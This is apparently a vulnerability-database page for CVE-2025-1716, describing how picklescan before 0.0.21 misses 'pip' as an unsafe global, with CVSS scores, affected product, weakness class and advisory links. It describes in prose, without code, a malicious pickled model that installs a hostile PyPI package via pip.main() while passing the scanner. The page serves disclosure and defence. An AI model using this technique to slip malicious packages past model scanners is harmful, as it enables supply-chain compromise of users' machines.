← Volver a CVEs
CVE-2025-1716
CRITICAL9.8
Descripcion
picklescan before 0.0.21 does not treat 'pip' as an unsafe global. An attacker could craft a malicious model that uses Pickle to pull in a malicious PyPI package (hosted, for example, on pypi.org or GitHub) via `pip.main()`. Because pip is not a restricted global, the model, when scanned with picklescan, would pass security checks and appear to be safe, when it could instead prove to be problematic.
Detalles CVE
Puntuacion CVSS v3.19.8
SeveridadCRITICAL
Vector CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vector de ataqueNETWORK
ComplejidadLOW
Privilegios requeridosNONE
Interaccion usuarioNONE
Publicado2/26/2025
Ultima modificacion12/29/2025
Fuentenvd
Avistamientos honeypot0
Productos afectados
mmaitre314:picklescan
Debilidades (CWE)
CWE-184
Referencias
https://github.com/mmaitre314/picklescan/commit/78ce704227c51f070c0c5fb4b466d92c62a7aa3d(103e4ec9-0a87-450b-af77-479448ddef11)
https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v(103e4ec9-0a87-450b-af77-479448ddef11)
https://www.sonatype.com/security-advisories/cve-2025-1716(103e4ec9-0a87-450b-af77-479448ddef11)
Correlaciones IOC
Sin correlaciones registradas
This product uses data from the NVD API but is not endorsed or certified by the NVD.